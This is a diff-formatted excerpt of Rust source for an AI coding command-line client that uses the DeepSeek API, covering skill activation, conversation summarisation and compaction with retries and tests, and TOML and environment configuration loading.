for skill in registry.list() {
|
||||
let _ = writeln!(output, " /{} - {}", skill.name, skill.description);
|
||||
}
|
||||
let _ = write!(
|
||||
output,
|
||||
"\nUse /skill <name> to run a skill\nSkills location: {}",
|
||||
skills_dir.display()
|
||||
);
|
||||
|
||||
CommandResult::message(output)
|
||||
}
|
||||
|
||||
/// Run a specific skill - activates skill for next user message
|
||||
pub fn run_skill(app: &mut App, name: Option<&str>) -> CommandResult {
|
||||
let name = match name {
|
||||
Some(n) => n.trim(),
|
||||
None => {
|
||||
return CommandResult::error("Usage: /skill <name>");
|
||||
}
|
||||
};
|
||||
|
||||
let skills_dir = app.skills_dir.clone();
|
||||
let registry = SkillRegistry::discover(&skills_dir);
|
||||
|
||||
if let Some(skill) = registry.get(name) {
|
||||
let instruction = format!(
|
||||
"You are now using a skill. Follow these instructions:\n\n# Skill: {}\n\n{}\n\n---\n\nNow respond to the user's request following the above skill instructions.",
|
||||
skill.name, skill.body
|
||||
);
|
||||
|
||||
app.add_message(HistoryCell::System {
|
||||
content: format!("Activated skill: {}\n\n{}", skill.name, skill.description),
|
||||
});
|
||||
|
||||
app.active_skill = Some(instruction);
|
||||
|
||||
CommandResult::message(format!(
|
||||
"Skill '{}' activated.\n\nDescription: {}\n\nType your request and the skill instructions will be applied.",
|
||||
skill.name, skill.description
|
||||
))
|
||||
} else {
|
||||
let available: Vec<String> = registry.list().iter().map(|s| s.name.clone()).collect();
|
||||
|
||||
if available.is_empty() {
|
||||
CommandResult::error(format!(
|
||||
"Skill '{name}' not found. No skills installed.\n\nUse /skills to see how to add skills."
|
||||
))
|
||||
} else {
|
||||
CommandResult::error(format!(
|
||||
"Skill '{}' not found.\n\nAvailable skills: {}",
|
||||
name,
|
||||
available.join(", ")
|
||||
))
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,427 @@
|
||||
//! Context compaction for long conversations.
|
||||
|
||||
#![allow(dead_code)]
|
||||
|
||||
use anyhow::Result;
|
||||
use std::fmt::Write;
|
||||
use std::time::Duration;
|
||||
|
||||
use crate::client::DeepSeekClient;
|
||||
use crate::llm_client::LlmClient;
|
||||
use crate::models::{
|
||||
CacheControl, ContentBlock, Message, MessageRequest, SystemBlock, SystemPrompt,
|
||||
};
|
||||
|
||||
/// Configuration for conversation compaction behavior.
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct CompactionConfig {
|
||||
pub enabled: bool,
|
||||
pub token_threshold: usize,
|
||||
pub message_threshold: usize,
|
||||
pub model: String,
|
||||
pub cache_summary: bool,
|
||||
}
|
||||
|
||||
impl Default for CompactionConfig {
|
||||
fn default() -> Self {
|
||||
Self {
|
||||
enabled: false,
|
||||
token_threshold: 50000,
|
||||
message_threshold: 50,
|
||||
model: "deepseek-reasoner".to_string(),
|
||||
cache_summary: true,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
pub fn estimate_tokens(messages: &[Message]) -> usize {
|
||||
// Rough estimate: ~4 chars per token
|
||||
messages
|
||||
.iter()
|
||||
.map(|m| {
|
||||
m.content
|
||||
.iter()
|
||||
.map(|c| match c {
|
||||
ContentBlock::Text { text, .. } => text.len() / 4,
|
||||
ContentBlock::Thinking { thinking } => thinking.len() / 4,
|
||||
ContentBlock::ToolUse { input, .. } => serde_json::to_string(input)
|
||||
.map(|s| s.len() / 4)
|
||||
.unwrap_or(100),
|
||||
ContentBlock::ToolResult { content, .. } => content.len() / 4,
|
||||
})
|
||||
.sum::<usize>()
|
||||
})
|
||||
.sum()
|
||||
}
|
||||
|
||||
pub fn should_compact(messages: &[Message], config: &CompactionConfig) -> bool {
|
||||
if !config.enabled {
|
||||
return false;
|
||||
}
|
||||
|
||||
let token_estimate = estimate_tokens(messages);
|
||||
let message_count = messages.len();
|
||||
|
||||
token_estimate > config.token_threshold || message_count > config.message_threshold
|
||||
}
|
||||
|
||||
fn truncate_chars(text: &str, max_chars: usize) -> &str {
|
||||
if max_chars == 0 {
|
||||
return "";
|
||||
}
|
||||
match text.char_indices().nth(max_chars) {
|
||||
Some((idx, _)) => &text[..idx],
|
||||
None => text,
|
||||
}
|
||||
}
|
||||
|
||||
/// Result of a compaction operation with metadata.
|
||||
#[derive(Debug)]
|
||||
pub struct CompactionResult {
|
||||
/// Compacted messages
|
||||
pub messages: Vec<Message>,
|
||||
/// Summary system prompt
|
||||
pub summary_prompt: Option<SystemPrompt>,
|
||||
/// Number of retries used before success
|
||||
pub retries_used: u32,
|
||||
}
|
||||
|
||||
/// Check if an error is transient and worth retrying.
|
||||
fn is_transient_error(e: &anyhow::Error) -> bool {
|
||||
let msg = e.to_string().to_lowercase();
|
||||
msg.contains("timeout")
|
||||
|| msg.contains("timed out")
|
||||
|| msg.contains("connection")
|
||||
|| msg.contains("rate limit")
|
||||
|| msg.contains("too many requests")
|
||||
|| msg.contains("503")
|
||||
|| msg.contains("502")
|
||||
|| msg.contains("429")
|
||||
|| msg.contains("network")
|
||||
|| msg.contains("temporarily unavailable")
|
||||
}
|
||||
|
||||
/// Compact messages with retry and backoff for transient errors.
|
||||
///
|
||||
/// This function wraps `compact_messages` with retry logic to handle
|
||||
/// transient network errors and rate limits. It uses exponential backoff
|
||||
/// with delays of 1s, 2s, 4s between retries.
|
||||
///
|
||||
/// # Safety
|
||||
/// - Never panics
|
||||
/// - Never corrupts the original messages (returns error instead)
|
||||
/// - Only retries on transient errors (network, rate limit, etc.)
|
||||
pub async fn compact_messages_safe(
|
||||
client: &DeepSeekClient,
|
||||
messages: &[Message],
|
||||
config: &CompactionConfig,
|
||||
) -> Result<CompactionResult> {
|
||||
const MAX_RETRIES: u32 = 3;
|
||||
const BASE_DELAY_MS: u64 = 1000;
|
||||
|
||||
let mut last_error: Option<anyhow::Error> = None;
|
||||
|
||||
for attempt in 0..MAX_RETRIES {
|
||||
if attempt > 0 {
|
||||
// Exponential backoff: 1s, 2s, 4s
|
||||
let delay = Duration::from_millis(BASE_DELAY_MS * (1 << (attempt - 1)));
|
||||
tokio::time::sleep(delay).await;
|
||||
}
|
||||
|
||||
match compact_messages(client, messages, config).await {
|
||||
Ok((msgs, prompt)) => {
|
||||
return Ok(CompactionResult {
|
||||
messages: msgs,
|
||||
summary_prompt: prompt,
|
||||
retries_used: attempt,
|
||||
});
|
||||
}
|
||||
Err(e) => {
|
||||
// Only retry on transient errors
|
||||
if !is_transient_error(&e) {
|
||||
return Err(e);
|
||||
}
|
||||
last_error = Some(e);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
Err(last_error
|
||||
.unwrap_or_else(|| anyhow::anyhow!("Compaction failed after {MAX_RETRIES} retries")))
|
||||
}
|
||||
|
||||
pub async fn compact_messages(
|
||||
client: &DeepSeekClient,
|
||||
messages: &[Message],
|
||||
config: &CompactionConfig,
|
||||
) -> Result<(Vec<Message>, Option<SystemPrompt>)> {
|
||||
if messages.is_empty() {
|
||||
return Ok((Vec::new(), None));
|
||||
}
|
||||
|
||||
// Keep the last few messages as-is
|
||||
let keep_recent = 4;
|
||||
let (to_summarize, recent) = if messages.len() <= keep_recent {
|
||||
return Ok((messages.to_vec(), None));
|
||||
} else {
|
||||
let split_point = messages.len() - keep_recent;
|
||||
(&messages[..split_point], &messages[split_point..])
|
||||
};
|
||||
|
||||
// Create a summary of older messages
|
||||
let summary = create_summary(client, to_summarize, &config.model).await?;
|
||||
|
||||
// Build new message list with summary as system block
|
||||
let summary_block = SystemBlock {
|
||||
block_type: "text".to_string(),
|
||||
text: format!(
|
||||
"## Conversation Summary\n\nThe following is a summary of the earlier conversation:\n\n{summary}\n\n---\nRecent messages follow:"
|
||||
),
|
||||
cache_control: if config.cache_summary {
|
||||
Some(CacheControl {
|
||||
cache_type: "ephemeral".to_string(),
|
||||
})
|
||||
} else {
|
||||
None
|
||||
},
|
||||
};
|
||||
|
||||
Ok((
|
||||
recent.to_vec(),
|
||||
Some(SystemPrompt::Blocks(vec![summary_block])),
|
||||
))
|
||||
}
|
||||
|
||||
async fn create_summary(
|
||||
client: &DeepSeekClient,
|
||||
messages: &[Message],
|
||||
model: &str,
|
||||
) -> Result<String> {
|
||||
// Format messages for summarization
|
||||
let mut conversation_text = String::new();
|
||||
for msg in messages {
|
||||
let role = if msg.role == "user" {
|
||||
"User"
|
||||
} else {
|
||||
"Assistant"
|
||||
};
|
||||
for block in &msg.content {
|
||||
match block {
|
||||
ContentBlock::Text { text, .. } => {
|
||||
let _ = write!(conversation_text, "{role}: {text}\n\n");
|
||||
}
|
||||
ContentBlock::ToolUse { name, .. } => {
|
||||
let _ = write!(conversation_text, "{role}: [Used tool: {name}]\n\n");
|
||||
}
|
||||
ContentBlock::ToolResult { content, .. } => {
|
||||
let snippet = truncate_chars(content, 500);
|
||||
let _ = write!(conversation_text, "Tool result: {}\n\n", snippet);
|
||||
}
|
||||
ContentBlock::Thinking { .. } => {
|
||||
// Skip thinking blocks in summary
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
let request = MessageRequest {
|
||||
model: model.to_string(),
|
||||
messages: vec![Message {
|
||||
role: "user".to_string(),
|
||||
content: vec![ContentBlock::Text {
|
||||
text: format!(
|
||||
"Summarize the following conversation in a concise but comprehensive way. \
|
||||
Preserve key information, decisions made, and any important context. \
|
||||
Keep it under 500 words.\n\n---\n\n{conversation_text}"
|
||||
),
|
||||
cache_control: None,
|
||||
}],
|
||||
}],
|
||||
max_tokens: 1024,
|
||||
system: Some(SystemPrompt::Text(
|
||||
"You are a helpful assistant that creates concise conversation summaries.".to_string(),
|
||||
)),
|
||||
tools: None,
|
||||
tool_choice: None,
|
||||
metadata: None,
|
||||
thinking: None,
|
||||
stream: Some(false),
|
||||
temperature: Some(0.3),
|
||||
top_p: None,
|
||||
};
|
||||
|
||||
let response = client.create_message(request).await?;
|
||||
|
||||
// Extract text from response
|
||||
let summary = response
|
||||
.content
|
||||
.iter()
|
||||
.filter_map(|block| match block {
|
||||
ContentBlock::Text { text, .. } => Some(text.clone()),
|
||||
_ => None,
|
||||
})
|
||||
.collect::<Vec<_>>()
|
||||
.join("\n");
|
||||
|
||||
Ok(summary)
|
||||
}
|
||||
|
||||
pub fn merge_system_prompts(
|
||||
original: Option<&SystemPrompt>,
|
||||
summary: Option<SystemPrompt>,
|
||||
) -> Option<SystemPrompt> {
|
||||
match (original, summary) {
|
||||
(None, None) => None,
|
||||
(Some(orig), None) => Some(orig.clone()),
|
||||
(None, Some(sum)) => Some(sum),
|
||||
(Some(SystemPrompt::Text(orig_text)), Some(SystemPrompt::Blocks(mut sum_blocks))) => {
|
||||
// Prepend original system prompt
|
||||
sum_blocks.insert(
|
||||
0,
|
||||
SystemBlock {
|
||||
block_type: "text".to_string(),
|
||||
text: orig_text.clone(),
|
||||
cache_control: None,
|
||||
},
|
||||
);
|
||||
Some(SystemPrompt::Blocks(sum_blocks))
|
||||
}
|
||||
(Some(SystemPrompt::Blocks(orig_blocks)), Some(SystemPrompt::Blocks(mut sum_blocks))) => {
|
||||
// Prepend original blocks
|
||||
for (i, block) in orig_blocks.iter().enumerate() {
|
||||
sum_blocks.insert(i, block.clone());
|
||||
}
|
||||
Some(SystemPrompt::Blocks(sum_blocks))
|
||||
}
|
||||
(Some(orig), Some(SystemPrompt::Text(sum_text))) => {
|
||||
let mut blocks = match orig {
|
||||
SystemPrompt::Text(t) => vec![SystemBlock {
|
||||
block_type: "text".to_string(),
|
||||
text: t.clone(),
|
||||
cache_control: None,
|
||||
}],
|
||||
SystemPrompt::Blocks(b) => b.clone(),
|
||||
};
|
||||
blocks.push(SystemBlock {
|
||||
block_type: "text".to_string(),
|
||||
text: sum_text,
|
||||
cache_control: None,
|
||||
});
|
||||
Some(SystemPrompt::Blocks(blocks))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#[cfg(test)]
|
||||
mod tests {
|
||||
use super::*;
|
||||
|
||||
#[test]
|
||||
fn truncate_chars_respects_unicode_boundaries() {
|
||||
let text = "abc😀é";
|
||||
assert_eq!(truncate_chars(text, 0), "");
|
||||
assert_eq!(truncate_chars(text, 1), "a");
|
||||
assert_eq!(truncate_chars(text, 3), "abc");
|
||||
assert_eq!(truncate_chars(text, 4), "abc😀");
|
||||
assert_eq!(truncate_chars(text, 5), "abc😀é");
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn is_transient_error_detects_network_issues() {
|
||||
let timeout_err = anyhow::anyhow!("Connection timeout");
|
||||
assert!(is_transient_error(&timeout_err));
|
||||
|
||||
let rate_limit_err = anyhow::anyhow!("429 Too Many Requests");
|
||||
assert!(is_transient_error(&rate_limit_err));
|
||||
|
||||
let service_err = anyhow::anyhow!("503 Service Unavailable");
|
||||
assert!(is_transient_error(&service_err));
|
||||
|
||||
let network_err = anyhow::anyhow!("network error: connection refused");
|
||||
assert!(is_transient_error(&network_err));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn is_transient_error_rejects_permanent_errors() {
|
||||
let auth_err = anyhow::anyhow!("401 Unauthorized: Invalid API key");
|
||||
assert!(!is_transient_error(&auth_err));
|
||||
|
||||
let parse_err = anyhow::anyhow!("Failed to parse JSON response");
|
||||
assert!(!is_transient_error(&parse_err));
|
||||
|
||||
let validation_err = anyhow::anyhow!("Invalid request: missing required field");
|
||||
assert!(!is_transient_error(&validation_err));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn estimate_tokens_empty_messages() {
|
||||
let messages: Vec<Message> = vec![];
|
||||
assert_eq!(estimate_tokens(&messages), 0);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn estimate_tokens_with_text() {
|
||||
let messages = vec![Message {
|
||||
role: "user".to_string(),
|
||||
content: vec![ContentBlock::Text {
|
||||
text: "Hello, world!".to_string(), // 13 chars = ~3 tokens
|
||||
cache_control: None,
|
||||
}],
|
||||
}];
|
||||
let tokens = estimate_tokens(&messages);
|
||||
assert!(tokens > 0 && tokens < 10);
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn should_compact_respects_enabled_flag() {
|
||||
let config = CompactionConfig {
|
||||
enabled: false,
|
||||
..Default::default()
|
||||
};
|
||||
// Even with many messages, disabled compaction should return false
|
||||
let messages: Vec<Message> = (0..100)
|
||||
.map(|_| Message {
|
||||
role: "user".to_string(),
|
||||
content: vec![ContentBlock::Text {
|
||||
text: "test".to_string(),
|
||||
cache_control: None,
|
||||
}],
|
||||
})
|
||||
.collect();
|
||||
assert!(!should_compact(&messages, &config));
|
||||
}
|
||||
|
||||
#[test]
|
||||
fn should_compact_respects_message_threshold() {
|
||||
let config = CompactionConfig {
|
||||
enabled: true,
|
||||
token_threshold: 1_000_000, // Very high
|
||||
message_threshold: 5,
|
||||
..Default::default()
|
||||
};
|
||||
|
||||
// Under threshold
|
||||
let few_messages: Vec<Message> = (0..4)
|
||||
.map(|_| Message {
|
||||
role: "user".to_string(),
|
||||
content: vec![ContentBlock::Text {
|
||||
text: "x".to_string(),
|
||||
cache_control: None,
|
||||
}],
|
||||
})
|
||||
.collect();
|
||||
assert!(!should_compact(&few_messages, &config));
|
||||
|
||||
// Over threshold
|
||||
let many_messages: Vec<Message> = (0..10)
|
||||
.map(|_| Message {
|
||||
role: "user".to_string(),
|
||||
content: vec![ContentBlock::Text {
|
||||
text: "x".to_string(),
|
||||
cache_control: None,
|
||||
}],
|
||||
})
|
||||
.collect();
|
||||
assert!(should_compact(&many_messages, &config));
|
||||
}
|
||||
}
|
||||
+706
@@ -0,0 +1,706 @@
|
||||
//! Configuration loading and defaults for deepseek-cli.
|
||||
|
||||
use std::collections::HashMap;
|
||||
use std::fmt::Write;
|
||||
use std::fs;
|
||||
use std::path::{Path, PathBuf};
|
||||
|
||||
use anyhow::{Context, Result};
|
||||
use serde::Deserialize;
|
||||
|
||||
use crate::features::{Features, FeaturesToml, is_known_feature_key};
|
||||
use crate::hooks::HooksConfig;
|
||||
|
||||
// === Types ===
|
||||
|
||||
/// Raw retry configuration loaded from config files.
|
||||
#[derive(Debug, Clone, Deserialize)]
|
||||
pub struct RetryConfig {
|
||||
pub enabled: Option<bool>,
|
||||
pub max_retries: Option<u32>,
|
||||
pub initial_delay: Option<f64>,
|
||||
pub max_delay: Option<f64>,
|
||||
pub exponential_base: Option<f64>,
|
||||
}
|
||||
|
||||
/// UI configuration loaded from config files.
|
||||
#[derive(Debug, Clone, Deserialize, Default)]
|
||||
pub struct TuiConfig {
|
||||
pub alternate_screen: Option<String>,
|
||||
}
|
||||
|
||||
/// Resolved retry policy with defaults applied.
|
||||
#[derive(Debug, Clone)]
|
||||
pub struct RetryPolicy {
|
||||
pub enabled: bool,
|
||||
pub max_retries: u32,
|
||||
pub initial_delay: f64,
|
||||
pub max_delay: f64,
|
||||
pub exponential_base: f64,
|
||||
}
|
||||
|
||||
impl RetryPolicy {
|
||||
/// Compute the backoff delay for a retry attempt.
|
||||
#[must_use]
|
||||
pub fn delay_for_attempt(&self, attempt: u32) -> std::time::Duration {
|
||||
let exponent = i32::try_from(attempt).unwrap_or(i32::MAX);
|
||||
let delay = self.initial_delay * self.exponential_base.powi(exponent);
|
||||
let delay = delay.min(self.max_delay);
|
||||
std::time::Duration::from_secs_f64(delay)
|
||||
}
|
||||
}
|
||||
|
||||
/// Resolved CLI configuration, including defaults and environment overrides.
|
||||
#[derive(Debug, Clone, Default, Deserialize)]
|
||||
pub struct Config {
|
||||
pub api_key: Option<String>,
|
||||
pub base_url: Option<String>,
|
||||
pub default_text_model: Option<String>,
|
||||
pub tools_file: Option<String>,
|
||||
pub skills_dir: Option<String>,
|
||||
pub mcp_config_path: Option<String>,
|
||||
pub notes_path: Option<String>,
|
||||
pub memory_path: Option<String>,
|
||||
pub allow_shell: Option<bool>,
|
||||
pub max_subagents: Option<usize>,
|
||||
pub retry: Option<RetryConfig>,
|
||||
pub features: Option<FeaturesToml>,
|
||||
|
||||
/// TUI configuration (alternate screen, etc.)
|
||||
pub tui: Option<TuiConfig>,
|
||||
|
||||
/// Lifecycle hooks configuration
|
||||
#[serde(default)]
|
||||
pub hooks: Option<HooksConfig>,
|
||||
}
|
||||
|
||||
#[derive(Debug, Clone, Deserialize, Default)]
|
||||
struct ConfigFile {
|
||||
#[serde(flatten)]
|
||||
base: Config,
|
||||
profiles: Option<HashMap<String, Config>>,
|
||||
}
|
||||
|
||||
// === Config Loading ===
|
||||
|
||||
impl Config {
|
||||
/// Load configuration from disk and merge with environment overrides.
|
||||
///
|
||||
/// # Examples
|
||||
///
|
||||
/// ```ignore
|
||||
/// # use crate::config::Config;
|
||||
/// let config = Config::load(None, None)?;
|
||||
/// # Ok::<(), anyhow::Error>(())
|
||||
/// ```
|
||||
pub fn load(path: Option<PathBuf>, profile: Option<&str>) -> Result<Self> {
|
||||
let path = path.or_else(default_config_path);
|
||||
let mut config = if let Some(path) = path.as_ref() {
|
||||
if path.exists() {
|
||||
let contents = fs::read_to_string(path)
|
||||
.with_context(|| format!("Failed to read config file: {}", path.display()))?;
|
||||
let parsed: ConfigFile = toml::from_str(&contents)
|
||||
.with_context(|| format!("Failed to parse config file: {}", path.display()))?;
|
||||
apply_profile(parsed, profile)?
|
||||
} else {
|
||||
Config::default()
|
||||
}
|
||||
} else {
|
||||
Config::default()
|
||||
};
|
||||
|
||||
apply_env_overrides(&mut config);
|
||||
config.validate()?;
|
||||
Ok(config)
|
||||
}
|
||||
|
||||
/// Validate that critical config fields are present.
|
||||
pub fn validate(&self) -> Result<()> {
|
||||
if let Some(ref key) = self.api_key
|
||||
&& key.trim().is_empty()
|
||||
{
|
||||
anyhow::bail!("api_key cannot be empty string");
|
||||
}
|
||||
if let Some(features) = &self.features {
|
||||
for key in features.entries.keys() {
|
||||
if !is_known_feature_key(key) {
|
||||
anyhow::bail!("Unknown feature flag: {key}");
|
||||
}
|
||||
}
|
||||
}
|
||||
if let Some(tui) = &self.tui
|
||||
&& let Some(mode) = tui.alternate_screen.as_deref()
|
||||
{
|
||||
let mode = mode.to_ascii_lowercase();
|
||||
if !matches!(mode.as_str(), "auto" | "always" | "never") {
|
||||
anyhow::bail!(
|
||||
"Invalid tui.alternate_screen '{mode}': expected auto, always, or never."
|
||||
);
|
||||
}
|
||||
}
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Return the `DeepSeek` base URL (normalized).
|
||||
#[must_use]
|
||||
pub fn deepseek_base_url(&self) -> String {
|
||||
let base = self
|
||||
.base_url
|
||||
.clone()
|
||||
.unwrap_or_else(|| "https://api.deepseek.com".to_string());
|
||||
normalize_base_url(&base)
|
||||
}
|
||||
|
||||
/// Read the `DeepSeek` API key from config/environment.
|
||||
pub fn deepseek_api_key(&self) -> Result<String> {
|
||||
self.api_key
|
||||
.clone()
|
||||
.context(
|
||||
"Failed to load DeepSeek API key: DEEPSEEK_API_KEY missing. Set it in config.toml or environment.",
|
||||
)
|
||||
}
|
||||
|
||||
/// Resolve the skills directory path.
|
||||
#[must_use]
|
||||
pub fn skills_dir(&self) -> PathBuf {
|
||||
self.skills_dir
|
||||
.as_deref()
|
||||
.map(expand_path)
|
||||
.or_else(default_skills_dir)
|
||||
.unwrap_or_else(|| PathBuf::from("./skills"))
|
||||
}
|
||||
|
||||
/// Resolve the MCP config path.
|
||||
#[must_use]
|
||||
pub fn mcp_config_path(&self) -> PathBuf {
|
||||
self.mcp_config_path
|
||||
.as_deref()
|
||||
.map(expand_path)
|
||||
.or_else(default_mcp_config_path)
|
||||
.unwrap_or_else(|| PathBuf::from("./mcp.json"))
|
||||
}
|
||||
|
||||
/// Resolve the notes file path.
|
||||
#[must_use]
|
||||
pub fn notes_path(&self) -> PathBuf {
|
||||
self.notes_path
|
||||
.as_deref()
|
||||
.map(expand_path)
|
||||
.or_else(default_notes_path)
|
||||
.unwrap_or_else(|| PathBuf::from("./notes.txt"))
|
||||
}
|
||||
|
||||
/// Resolve the memory file path.
|
||||
#[must_use]
|
||||
pub fn memory_path(&self) -> PathBuf {
|
||||
self.memory_path
|
||||
.as_deref()
|
||||
.map(expand_path)
|
||||
.or_else(default_memory_path)
|
||||
.unwrap_or_else(|| PathBuf::from("./memory.md"))
|
||||
}
|
||||
|
||||
/// Return whether shell execution is allowed.
|
||||
#[must_use]
|
||||
pub fn allow_shell(&self) -> bool {
|
||||
self.allow_shell.unwrap_or(false)
|
||||
}
|
||||
|
||||
/// Return the maximum number of concurrent sub-agents.
|
||||
#[must_use]
|
||||
pub fn max_subagents(&self) -> usize {
|
||||
self.max_subagents.unwrap_or(5).clamp(1, 5)
|
||||
}
|
||||
|
||||
/// Get hooks configuration, returning default if not configured.
|
||||
pub fn hooks_config(&self) -> HooksConfig {
|
||||
self.hooks.clone().unwrap_or_default()
|
||||
}
|
||||
|
||||
/// Resolve enabled features from defaults and config entries.
|
||||
#[must_use]
|
||||
pub fn features(&self) -> Features {
|
||||
let mut features = Features::with_defaults();
|
||||
if let Some(table) = &self.features {
|
||||
features.apply_map(&table.entries);
|
||||
}
|
||||
features
|
||||
}
|
||||
|
||||
/// Override a feature flag in memory (used by CLI overrides).
|
||||
pub fn set_feature(&mut self, key: &str, enabled: bool) -> Result<()> {
|
||||
if !is_known_feature_key(key) {
|
||||
anyhow::bail!("Unknown feature flag: {key}");
|
||||
}
|
||||
let table = self.features.get_or_insert_with(FeaturesToml::default);
|
||||
table.entries.insert(key.to_string(), enabled);
|
||||
Ok(())
|
||||
}
|
||||
|
||||
/// Resolve the effective retry policy with defaults applied.
|
||||
#[must_use]
|
||||
pub fn retry_policy(&self) -> RetryPolicy {
|
||||
let defaults = RetryPolicy {
|
||||
enabled: true,
|
||||
max_retries: 3,
|
||||
initial_delay: 1.0,
|
||||
max_delay: 60.0,
|
||||
exponential_base: 2.0,
|
||||
};
|
||||
|
||||
let Some(cfg) = &self.retry else {
|
||||
return defaults;
|
||||
};
|
||||
|
||||
RetryPolicy {
|
||||
enabled: cfg.enabled.unwrap_or(defaults.enabled),
|
||||
max_retries: cfg.max_retries.unwrap_or(defaults.max_retries),
|
||||
initial_delay: cfg.initial_delay.unwrap_or(defaults.initial_delay),
|
||||
max_delay: cfg.max_delay.unwrap_or(defaults.max_delay),
|
||||
exponential_base: cfg.exponential_base.unwrap_or(defaults.exponential_base),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// === Defaults ===
|
||||
|
||||
fn default_config_path() -> Option<PathBuf> {
|
||||
if let Ok(path) = std::env::var("DEEPSEEK_CONFIG_PATH")
|
||||
&& !path.trim().is_empty()
|
||||
{
|
||||
return Some(PathBuf::from(path));
|
||||
}
|
||||
dirs::home_dir().map(|home| home.join(".deepseek").join("config.toml"))
|
||||
}
|
||||
|
||||
fn expand_path(path: &str) -> PathBuf {
|
||||
let expanded = shellexpand::tilde(path);
|
||||
PathBuf::from(expanded.as_ref())
|
||||
}
|
||||
|
||||
fn default_skills_dir() -> Option<PathBuf> {
|
||||
dirs::home_dir().map(|home| home.join(".deepseek").join("skills"))
|
||||
}
|
||||
|
||||
fn default_mcp_config_path() -> Option<PathBuf> {
|
||||
dirs::home_dir().map(|home| home.join(".deepseek").join("mcp.json"))
|
||||
}
|
||||
|
||||
fn default_notes_path() -> Option<PathBuf> {
|
||||
dirs::home_dir().map(|home| home.join(".deepseek").join("notes.txt"))
|
||||
}
|
||||
|
||||
fn default_memory_path() -> Option<PathBuf> {
|
||||
dirs::home_dir().map(|home| home.join(".deepseek").join("memory.md"))
|
||||
}
|
||||
|
||||
// === Environment Overrides ===
|
||||
|
||||
fn apply_env_overrides(config: &mut Config) {
|
||||
if let Ok(value) = std::env::var("DEEPSEEK_API_KEY") {
|
||||
config.api_key = Some(value);
|
||||
}
|
||||
if let Ok(value) = std::env::var("DEEPSEEK_BASE_URL") {
|
||||
config.base_url = Some(value);
|
||||
}
|
||||
if let Ok(value) = std::env::var("DEEPSEEK_SKILLS_DIR") {
|
||||
config.skills_dir = Some(value);
|
||||
}
|
||||
if let Ok(value) = std::env::var("DEEPSEEK_MCP_CONFIG") {
|
||||
config.mcp_config_path = Some(value);
|
||||
}
|
||||
if let Ok(value) = std::env::var("DEEPSEEK_NOTES_PATH") {
|
||||
config.notes_path = Some(value);
|
||||
}
|
||||
if let Ok(value) = std::env::var("DEEPSEEK_MEMORY_PATH") {
|
||||
config.memory_path = Some(value);
|
||||
}
|
||||
if let Ok(value) = std::env::var("DEEPSEEK_ALLOW_SHELL") {
|
||||
config.allow_shell = Some(value == "1" || value.eq_ignore_ascii_case("true"));
|
||||
}
|
||||
if let Ok(value) = std::env::var("DEEPSEEK_MAX_SUBAGENTS")
|
||||
&& let Ok(parsed) = value.parse::<usize>()
|
||||
{
|
||||
config.max_subagents = Some(parsed.clamp(1, 5));
|
||||
}
|
||||
}
|
||||
|
||||
fn normalize_base_url(base: &str) -> String {
|
||||
let trimmed = base.trim_end_matches('/');
|
||||
let deepseek_domains = ["api.deepseek.com", "api.deepseeki.com"];
|
||||
if deepseek_domains
|
||||
.iter()
|
||||
.any(|domain| trimmed.contains(domain))
|
||||
{
|
||||
return trimmed.trim_end_matches("/v1").to_string();
|
||||
}
|
||||
trimmed.to_string()
|
||||
}
|
||||
|
||||
fn apply_profile(config: ConfigFile, profile: Option<&str>) -> Result<Config> {
|
||||
if let Some(profile_name) = profile {
|
||||
let profiles = config.profiles.as_ref();
|
||||
match profiles.and_then(|profiles| profiles.get(profile_name)) {
|
||||
Some(override_cfg) => Ok(merge_config(config.base, override_cfg.clone())),
|
||||
None => {
|
||||
let available = profiles
|
||||
.map(|profiles| {
|
||||
let mut keys = profiles.keys().cloned().collect::<Vec<_>>();
|
||||
keys.sort();
|
||||
if keys.is_empty() {
|
||||
"none".to_string()
|
||||
} else {
|
||||
keys.join(", ")
|
||||
}
|
||||
})
|
||||
.unwrap_or_else(|| "none".to_string());
|
||||
anyhow::bail!(
|
||||
"Profile '{}' not found. Available profiles: {}",
|
||||
profile_name,
|
||||
available
|
||||
)
|
||||
}
|
||||
}
|
||||
} else {
|
||||
Ok(config.base)
|
||||
}
|
||||
}
|
||||
|
||||
fn merge_config(base: Config, override_cfg: Config) -> Config {
|
||||
Config {
|
||||
api_key: override_cfg.api_key.or(base.api_key),
|
||||
base_url: override_cfg.base_url.or(base.base_url),
|
||||
default_text_model: override_cfg.default_text_model.or(base.default_text_model),
|
||||
tools_file: override_cfg.tools_file.or(base.tools_file),
|
||||
skills_dir: override_cfg.skills_dir.or(base.skills_dir),
|
||||
mcp_config_path: override_cfg.mcp_config_path.or(base.mcp_config_path),
|
||||
notes_path: override_cfg.notes_path.or(base.notes_path),
|
||||
memory_path: override_cfg.memory_path.or(base.memory_path),
|
||||
allow_shell: override_cfg.allow_shell.or(base.allow_shell),
|
||||
max_subagents: override_cfg.max_subagents.or(base.max_subagents),
|
||||
retry: override_cfg.retry.or(base.retry),
|
||||
tui: override_cfg.tui.or(base.tui),
|
||||
hooks: override_cfg.hooks.or(base.hooks),
|
||||
features: merge_features(base.features, override_cfg.features),
|
||||
}
|
||||
}
|
||||
|
||||
fn merge_features(
|
||||
base: Option<FeaturesToml>,
|
||||
override_cfg: Option<FeaturesToml>,
|
||||
) -> Option<FeaturesToml> {
|
||||
match (base, override_cfg) {
|
||||
(None, None) => None,
|
||||
(Some(mut base), Some(override_cfg)) => {
|
||||
for (key, value) in override_cfg.entries {
|
||||
base.entries.insert(key, value);
|
||||
}
|
||||
Some(base)
|
||||
}
|
||||
(Some(base), None) => Some(base),
|
||||
(None, Some(override_cfg)) => Some(override_cfg),
|
||||
}
|
||||
}
|
||||
|
||||
pub fn ensure_parent_dir(path: &Path) -> Result<()> {
|
||||
if let Some(parent) = path.parent() {
|
||||
fs::create_dir_all(parent)
|
||||
.with_context(|| format!("Failed to create directory: {}", parent.display()))?;
|
||||
}
|
||||
Ok(())
|
||||
}
|
